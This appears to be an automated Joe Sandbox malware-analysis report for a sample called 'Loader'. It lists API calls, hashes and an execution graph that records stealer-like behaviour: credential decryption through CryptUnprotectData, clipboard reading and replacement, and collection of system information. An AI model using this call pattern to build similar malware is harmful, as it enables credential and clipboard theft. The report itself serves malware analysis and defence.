                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 158306478-0
                                                                                        • Opcode ID: 9e4058172e66008e31ce9a7924e9e5b40dd5017c95d7b988b8b967861ee1cade
                                                                                        • Instruction ID: ab2ef57568631bad7ac03f6b2f6cfa4afaa183c2729defa7f0a949b6ccc34f9a
                                                                                        • Opcode Fuzzy Hash: 9e4058172e66008e31ce9a7924e9e5b40dd5017c95d7b988b8b967861ee1cade
                                                                                        • Instruction Fuzzy Hash: 9E11E1B250460D7EA62127B25D89CBF6DADCE593AD715203AF906F6241FA318D02D2B2
                                                                                        APIs
                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00EB2A8D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EB2A9B
                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AB4
                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 2261580123-0
                                                                                        • Opcode ID: 8d3fb30bb704b55e7ebd4147ab6a1a317fd3c95c196d0ba022755a3bcf04b384
                                                                                        • Instruction ID: 1595750cefe9c647a65e3d424e080e96f646a044b0a6683ba80cadb26087b18b
                                                                                        • Opcode Fuzzy Hash: 8d3fb30bb704b55e7ebd4147ab6a1a317fd3c95c196d0ba022755a3bcf04b384
                                                                                        • Instruction Fuzzy Hash: 6221E2B4E042098FCB08EFA8C5956AEFBF0BF48300F11946DE899AB351D7389941CF51
                                                                                        APIs
                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000), ref: 00EDA487
                                                                                        • GetLastError.KERNEL32(?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?,?,00ED2DF7,?), ref: 00EDA493
                                                                                          • Part of subcall function 00EDA4E4: CloseHandle.KERNEL32(FFFFFFFE,00EDA4A3,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?), ref: 00EDA4F4
                                                                                        • ___initconout.LIBCMT ref: 00EDA4A3
                                                                                          • Part of subcall function 00EDA4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EDA461,00ED993F,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4D8
                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                        • String ID:
                                                                                        • API String ID: 2744216297-0
                                                                                        • Opcode ID: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
                                                                                        • Instruction ID: 6b04e7323492d622e264a5561302be2db0275c228075e978de239f970cd69a97
                                                                                        • Opcode Fuzzy Hash: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
                                                                                        • Instruction Fuzzy Hash: B9F03736000559BFCF222F92EC4898D3F66FB453A0B054421FE2DA9270D672CA209B95
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EBEFB9
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EBEFC8
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00EBEFD1
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00EBEFDE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
                                                                                        • Instruction ID: c5d54e8326a6569928ec6745f661902636bec7c6b875e2a0c649e8d6348f12dc
                                                                                        • Opcode Fuzzy Hash: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
                                                                                        • Instruction Fuzzy Hash: 51F0B770C0020CEFCB00DFB5C68898EB7F4EF1C200B5149A5A412FB150E730AB44CB50
                                                                                        APIs
                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00ECA6E1,?,?,00000000,00000000,00000000,?), ref: 00ECA805
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 2118026453-2084237596
                                                                                        • Opcode ID: f6d812d92e7d29b32cea3cd0e1ebed0dce9b8c1c8d02fa3c25302bb1d5d40534
                                                                                        • Instruction ID: cc740fe4c91df9bc188de9ceae4cc15689b3511dd0d2b9dd0ca25584639dd141
                                                                                        • Opcode Fuzzy Hash: f6d812d92e7d29b32cea3cd0e1ebed0dce9b8c1c8d02fa3c25302bb1d5d40534
                                                                                        • Instruction Fuzzy Hash: BD41797290020DAFCF19CF94CE85EEEBBB5BF48308F189169F90476221D2369952DB51
                                                                                        APIs
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00ECA2C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___except_validate_context_record
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 3493665558-3733052814
                                                                                        • Opcode ID: 4971009a508608decb0905792cc70625c607c68b3e521e308a6b81d539822e82
                                                                                        • Instruction ID: e0e9f786c6a9a36e47238fdfbdd81b44bf3e79a22e98c1165bc2de9d17b6b334
                                                                                        • Opcode Fuzzy Hash: 4971009a508608decb0905792cc70625c607c68b3e521e308a6b81d539822e82
                                                                                        • Instruction Fuzzy Hash: BE31C03250029CDBCF228F58DA58EAE7B66EB0871DB1C516EFC5429121C337C863DB82
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00EB4B2B
                                                                                          • Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBE98
                                                                                          • Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBEBC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Yarn$LockitLockit::_std::_
                                                                                        • String ID: ^I$bad locale name
                                                                                        • API String ID: 360232963-2946685981
                                                                                        • Opcode ID: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
                                                                                        • Instruction ID: 2af3c087ecef989d01c827ad86edf440288a344280d7226125cee870566c833c
                                                                                        • Opcode Fuzzy Hash: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
                                                                                        • Instruction Fuzzy Hash: 6B01ED7090410C9BDB08FFA9D4917EEBBF1AF44308F10546CE64677383CA30AA90CB96
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandLine
                                                                                        • String ID: P'r
                                                                                        • API String ID: 3253501508-4147336663
                                                                                        • Opcode ID: 34e36fc1ea25e4987246a7d34e82e1c29810c7ecfcf0a89f2fafb01f0e9b6234
                                                                                        • Instruction ID: 6db0906eb897d344540c8f592e4d16fc6c15f05ab70b9240d4bb3a67ef166316
                                                                                        • Opcode Fuzzy Hash: 34e36fc1ea25e4987246a7d34e82e1c29810c7ecfcf0a89f2fafb01f0e9b6234
                                                                                        • Instruction Fuzzy Hash: F2B048B88587CC8F87008F23B8980043BA0B389A1238000E9F44AAAAB0E67405488F08

                                                                                        Execution Graph

                                                                                        Execution Coverage:5.3%
                                                                                        Dynamic/Decrypted Code Coverage:7.1%
                                                                                        Signature Coverage:33.6%
                                                                                        Total number of Nodes:238
                                                                                        Total number of Limit Nodes:18
                                                                                        execution_graph 33117 43dd42 33118 43dd70 33117->33118 33119 43ddee 33118->33119 33121 43da10 LdrInitializeThunk 33118->33121 33121->33119 33122 43de41 33123 43de60 33122->33123 33126 43da10 LdrInitializeThunk 33123->33126 33125 43e37f 33126->33125 33132 417745 33133 417750 33132->33133 33133->33133 33134 4178d0 CryptUnprotectData 33133->33134 33135 4178fa 33134->33135 33135->33135 33249 436885 33250 4368ac 33249->33250 33251 4368ed 33250->33251 33253 43da10 LdrInitializeThunk 33250->33253 33253->33250 33254 42c98c 33255 42c9b0 33254->33255 33255->33255 33256 42cda4 GetPhysicallyInstalledSystemMemory 33255->33256 33257 42cde0 33256->33257 33257->33257 33136 42d0cd 33137 42d100 33136->33137 33137->33137 33138 42d208 33137->33138 33140 43da10 LdrInitializeThunk 33137->33140 33140->33138 33141 4230d3 33142 4230dd 33141->33142 33142->33142 33148 440dc0 33142->33148 33144 423367 33144->33144 33145 423351 GetLogicalDrives 33147 440dc0 LdrInitializeThunk 33145->33147 33146 4231d1 33146->33144 33146->33145 33146->33146 33147->33144 33149 440de0 33148->33149 33150 440f1e 33149->33150 33152 43da10 LdrInitializeThunk 33149->33152 33150->33146 33152->33150 33258 426090 33259 4260c0 33258->33259 33261 42614e 33259->33261 33268 43da10 LdrInitializeThunk 33259->33268 33260 426270 33261->33260 33263 43bd20 RtlAllocateHeap 33261->33263 33265 4261be 33263->33265 33264 43bd40 RtlFreeHeap 33264->33260 33267 42626e 33265->33267 33269 43da10 LdrInitializeThunk 33265->33269 33267->33264 33267->33267 33268->33261 33269->33267 33270 43d990 33271 43d9d5 33270->33271 33272 43d9ca 33270->33272 33273 43d9a8 33270->33273 33276 43d9d0 33270->33276 33277 43d9b6 33270->33277 33279 43d9e1 33270->33279 33274 43bd40 RtlFreeHeap 33271->33274 33278 43bd20 RtlAllocateHeap 33272->33278 33273->33271 33273->33276 33273->33277 33273->33279 33274->33279 33275 43bd40 RtlFreeHeap 33275->33276 33280 43d9bb RtlReAllocateHeap 33277->33280 33278->33276 33279->33275 33280->33276 33153 40cad6 CoInitializeEx CoInitializeEx 33281 432919 33284 414290 33281->33284 33283 43291e CoSetProxyBlanket 33284->33283 33154 31b1000 33155 31b1102 33154->33155 33156 31b1012 33154->33156 33157 31b103a OpenClipboard 33156->33157 33158 31b1030 Sleep 33156->33158 33159 31b104a GetClipboardData 33157->33159 33160 31b10f9 GetClipboardSequenceNumber 33157->33160 33158->33156 33161 31b105a GlobalLock 33159->33161 33162 31b10f3 CloseClipboard 33159->33162 33160->33156 33161->33162 33163 31b106b 33161->33163 33162->33160 33163->33163 33164 31b108d GlobalAlloc 33163->33164 33165 31b10e9 GlobalUnlock 33164->33165 33166 31b109d GlobalLock 33164->33166 33165->33162 33167 31b10b0 33166->33167 33168 31b10b9 GlobalUnlock 33167->33168 33169 31b10cb EmptyClipboard SetClipboardData 33168->33169 33170 31b10e0 GlobalFree 33168->33170 33169->33165 33169->33170 33170->33165 33285 40d11b 33286 40d130 33285->33286 33289 4387d0 33286->33289 33288 40d24a 33288->33288 33290 438800 CoCreateInstance 33289->33290 33292 438a70 SysAllocString 33290->33292 33293 438fbb 33290->33293 33296 438afa 33292->33296 33294 438fcb GetVolumeInformationW 33293->33294 33304 438fe6 33294->33304 33297 438b02 CoSetProxyBlanket 33296->33297 33298 438fa8 SysFreeString 33296->33298 33299 438b22 SysAllocString 33297->33299 33300 438f9e 33297->33300 33298->33293 33302 438c30 33299->33302 33300->33298 33302->33302 33303 438c46 SysAllocString 33302->33303 33306 438c6e 33303->33306 33304->33288 33305 438f89 SysFreeString SysFreeString 33305->33300 33306->33305 33307 438f7f 33306->33307 33308 438cb9 VariantInit 33306->33308 33307->33305 33310 438d10 33308->33310 33309 438f6e VariantClear 33309->33307 33310->33309 33311 40e11e 33314 411bc0 33311->33314 33313 40e124 33323 411bd9 33314->33323 33315 411be0 33315->33313 33316 412276 RtlExpandEnvironmentStrings 33316->33323 33317 41389f CreateThread 33317->33323 33318 4125bc RtlExpandEnvironmentStrings 33318->33323 33319 43bd40 RtlFreeHeap 33319->33323 33321 43da10 LdrInitializeThunk 33321->33323 33323->33315 33323->33316 33323->33317 33323->33318 33323->33319 33323->33321 33324 440aa0 LdrInitializeThunk 33323->33324 33325 441190 LdrInitializeThunk 33323->33325 33324->33323 33325->33323 33171 420760 33172 4207c0 33171->33172 33173 42076e 33171->33173 33177 420880 33173->33177 33175 42083c 33175->33172 33176 41e990 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 33175->33176 33176->33172 33178 420890 33177->33178 33179 440dc0 LdrInitializeThunk 33178->33179 33180 4209cf 33179->33180 33326 43e9a1 GetForegroundWindow 33330 43fda0 33326->33330 33328 43e9b0 GetForegroundWindow 33329 43e9c2 33328->33329 33331 43fdb0 33330->33331 33331->33328 33332 4336a0 33333 4336ce GetSystemMetrics GetSystemMetrics 33332->33333 33334 433711 33333->33334 33181 40cc67 CoInitializeSecurity 33182 42e1ee CoSetProxyBlanket 33340 41052c 33341 410546 33340->33341 33342 4107ff RtlExpandEnvironmentStrings 33341->33342 33345 40ead5 33341->33345 33343 410876 33342->33343 33344 4108e0 RtlExpandEnvironmentStrings 33343->33344 33343->33345 33344->33345 33347 41095e 33344->33347 33348 414ea0 33347->33348 33349 414ec0 33348->33349 33349->33349 33362 440c30 33349->33362 33351 415083 33352 4150a5 33351->33352 33356 415256 33351->33356 33358 4152d2 33351->33358 33361 4150e2 33351->33361 33372 440f70 LdrInitializeThunk 33351->33372 33352->33356 33352->33358 33352->33361 33366 441030 33352->33366 33356->33361 33373 43da10 LdrInitializeThunk 33356->33373 33360 440c30 LdrInitializeThunk 33358->33360 33359 4154ca 33360->33361 33361->33345 33361->33361 33364 440c50 33362->33364 33363 440d6e 33363->33351 33364->33363 33374 43da10 LdrInitializeThunk 33364->33374 33367 441060 33366->33367 33367->33367 33369 4410ae 33367->33369 33375 43da10 LdrInitializeThunk 33367->33375 33370 4150d3 33369->33370 33376 43da10 LdrInitializeThunk 33369->33376 33370->33356 33370->33358 33370->33361 33372->33352 33373->33359 33374->33363 33375->33369 33376->33370 33377 43dbac 33378 43dbc0 33377->33378 33379 43dc3e 33378->33379 33384 43da10 LdrInitializeThunk 33378->33384 33383 43da10 LdrInitializeThunk 33379->33383 33382 43e21d 33383->33382 33384->33379 33385 42bf32 33386 42bf3e GetComputerNameExA 33385->33386 33388 4085b0 33390 4085bc 33388->33390 33389 4086d9 ExitProcess 33390->33389 33391 4085d1 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 33390->33391 33396 4086b1 33390->33396 33392 408600 33391->33392 33393 43bd20 RtlAllocateHeap 33392->33393 33394 408638 GetForegroundWindow 33393->33394 33394->33396 33397 4086bd 33396->33397 33397->33389 33397->33396 33183 43bd70 33184 43bd90 33183->33184 33185 43be0e 33184->33185 33193 43da10 LdrInitializeThunk 33184->33193 33190 43c001 33185->33190 33194 43bd20 33185->33194 33189 43be6a 33192 43bf0e 33189->33192 33197 43da10 LdrInitializeThunk 33189->33197 33198 43bd40 33192->33198 33193->33185 33202 43f2f0 33194->33202 33196 43bd2a RtlAllocateHeap 33196->33189 33197->33192 33199 43bd53 33198->33199 33200 43bd55 33198->33200 33199->33190 33201 43bd5a RtlFreeHeap 33200->33201 33201->33190 33203 43f300 33202->33203 33203->33196 33203->33203 33204 43fef0 33205 43ff10 33204->33205 33207 43ff4e 33205->33207 33214 43da10 LdrInitializeThunk 33205->33214 33206 44016d 33207->33206 33209 43bd20 RtlAllocateHeap 33207->33209 33210 43ffc5 33209->33210 33213 44003f 33210->33213 33215 43da10 LdrInitializeThunk 33210->33215 33211 43bd40 RtlFreeHeap 33211->33206 33213->33211 33213->33213 33214->33207 33215->33213 33398 4384b0 33399 4384d5 33398->33399 33402 438576 33399->33402 33407 43da10 LdrInitializeThunk 33399->33407 33400 438761 33402->33400 33404 43865e 33402->33404 33406 43da10 LdrInitializeThunk 33402->33406 33404->33400 33408 43da10 LdrInitializeThunk 33404->33408 33406->33402 33407->33399 33408->33404 33221 440770 33222 440781 33221->33222 33223 4408af 33222->33223 33231 43da10 LdrInitializeThunk 33222->33231 33224 440a86 33223->33224 33226 43bd20 RtlAllocateHeap 33223->33226 33227 440939 33226->33227 33229 4409be 33227->33229 33232 43da10 LdrInitializeThunk 33227->33232 33228 43bd40 RtlFreeHeap 33228->33224 33229->33228 33231->33223 33232->33229 33233 42bdf4 33235 42be04 33233->33235 33234 42beab GetComputerNameExA 33236 42bf2e 33234->33236 33235->33234 33236->33236 33409 40d4b9 33410 40d510 33409->33410 33410->33410 33412 43da10 LdrInitializeThunk 33410->33412 33412->33410 33413 436a38 33414 436a50 33413->33414 33415 436a65 GetUserDefaultUILanguage 33414->33415 33416 436a85 33415->33416 33237 42217d 33238 422194 33237->33238 33245 422222 33237->33245 33238->33245 33246 43da10 LdrInitializeThunk 33238->33246 33239 4227c1 33241 422e64 33247 43da10 LdrInitializeThunk 33241->33247 33244 422e86 33245->33239 33245->33241 33248 43da10 LdrInitializeThunk 33245->33248 33246->33245 33247->33244 33248->33245
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$$$%JU$&$'$($($*$*$-$.$3$4$4$5$7$8$8$9$:$;$<$>$?$@$@$B$C$D$D$D$D$D$E$F$G$I$L$L$M`QW$Z$[$\$_$`$`$`$a$a$c$e$e$e$f$f$f$g$g$g$g$h$h$i$j$k$l$m$o$o$q$r$w$y${$|$}$}
                                                                                        • API String ID: 0-362997037
                                                                                        • Opcode ID: 4d9be5020c6e82cf067b014f18fe9f73e9b73f1c5d366c73e9ef59bca02c0f63
                                                                                        • Instruction ID: 73db62761c6805435fe7a1f262c61e7275afd3a694a408c1188180c8cf5c63de
                                                                                        • Opcode Fuzzy Hash: 4d9be5020c6e82cf067b014f18fe9f73e9b73f1c5d366c73e9ef59bca02c0f63
                                                                                        • Instruction Fuzzy Hash: 0A13E17160C7C08AD3349B3889443EFBFD1ABD6324F188A2EE5E9873D2D67885858757

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 476 4387d0-4387f5 477 438800-43882f 476->477 477->477 478 438831-438844 477->478 479 438850-438890 478->479 479->479 480 438892-4388d7 479->480 481 4388e0-43890e 480->481 481->481 482 438910-43892f 481->482 484 4389d2-4389df 482->484 485 438935-43893e 482->485 487 4389e0-438a0b 484->487 486 438940-438970 485->486 486->486 488 438972-438988 486->488 487->487 489 438a0d-438a6a CoCreateInstance 487->489 490 438990-4389bc 488->490 491 438a70-438aa1 489->491 492 438fbb-438fe4 call 43f730 GetVolumeInformationW 489->492 490->490 494 4389be-4389cb 490->494 495 438ab0-438ace 491->495 498 438fe6-438fea 492->498 499 438fee-438ff0 492->499 494->484 495->495 497 438ad0-438afc SysAllocString 495->497 502 438b02-438b1c CoSetProxyBlanket 497->502 503 438fa8-438fb7 SysFreeString 497->503 498->499 500 43900d-439014 499->500 504 439020-439036 500->504 505 439016-43901d 500->505 506 438b22-438b3f 502->506 507 438f9e-438fa4 502->507 503->492 508 439040-439054 504->508 505->504 509 438b40-438bae 506->509 507->503 508->508 510 439056-43908f 508->510 509->509 512 438bb0-438c26 SysAllocString 509->512 511 439090-4390c9 510->511 511->511 513 4390cb-4390ff call 41d350 511->513 514 438c30-438c44 512->514 518 439100-439108 513->518 514->514 516 438c46-438c77 SysAllocString 514->516 521 438f89-438f9b SysFreeString * 2 516->521 522 438c7d-438c9f 516->522 518->518 520 43910a-43910c 518->520 523 439112-439122 call 407ff0 520->523 524 439000-439007 520->524 521->507 529 438ca5-438ca8 522->529 530 438f7f-438f85 522->530 523->524 524->500 527 439127-43912e 524->527 529->530 531 438cae-438cb3 529->531 530->521 531->530 532 438cb9-438d01 VariantInit 531->532 533 438d10-438d51 532->533 533->533 534 438d53-438d65 533->534 535 438d69-438d72 534->535 536 438d78-438d7e 535->536 537 438f6e-438f7b VariantClear 535->537 536->537 538 438d84-438d8e 536->538 537->530 539 438d90-438d97 538->539 540 438dcd-438dcf 538->540 541 438dac-438db0 539->541 542 438dd1-438deb call 407f70 540->542 543 438db2-438dbb 541->543 544 438da0 541->544 550 438df1-438dfd 542->550 551 438f19-438f2a 542->551 547 438dc2-438dc6 543->547 548 438dbd-438dc0 543->548 546 438da1-438daa 544->546 546->541 546->542 547->546 552 438dc8-438dcb 547->552 548->546 550->551 553 438e03-438e0b 550->553 554 438f31-438f44 551->554 555 438f2c 551->555 552->546 556 438e10-438e1a 553->556 557 438f46 554->557 558 438f4b-438f6b call 407fa0 call 407f80 554->558 555->554 559 438e30-438e36 556->559 560 438e1c-438e21 556->560 557->558 558->537 563 438e54-438e62 559->563 564 438e38-438e3b 559->564 562 438ec0-438ec6 560->562 570 438ec8-438ece 562->570 567 438e64-438e67 563->567 568 438eda-438ee2 563->568 564->563 566 438e3d-438e52 564->566 566->562 567->568 571 438e69-438ebf 567->571 574 438ee4-438ee6 568->574 575 438ee8-438eeb 568->575 570->551 573 438ed0-438ed2 570->573 571->562 573->556 578 438ed8 573->578 574->570 576 438f15-438f17 575->576 577 438eed-438f13 575->577 576->562 577->562 578->551
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438A5F
                                                                                        • SysAllocString.OLEAUT32(AF71AD7E), ref: 00438AD5
                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B14
                                                                                        • SysAllocString.OLEAUT32(5F8F5D8B), ref: 00438BB5
                                                                                        • SysAllocString.OLEAUT32(4F0B4D1F), ref: 00438C4B
                                                                                        • VariantInit.OLEAUT32(F2FDFCE7), ref: 00438CBE
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00438FAC
                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438FE0
                                                                                        Strings
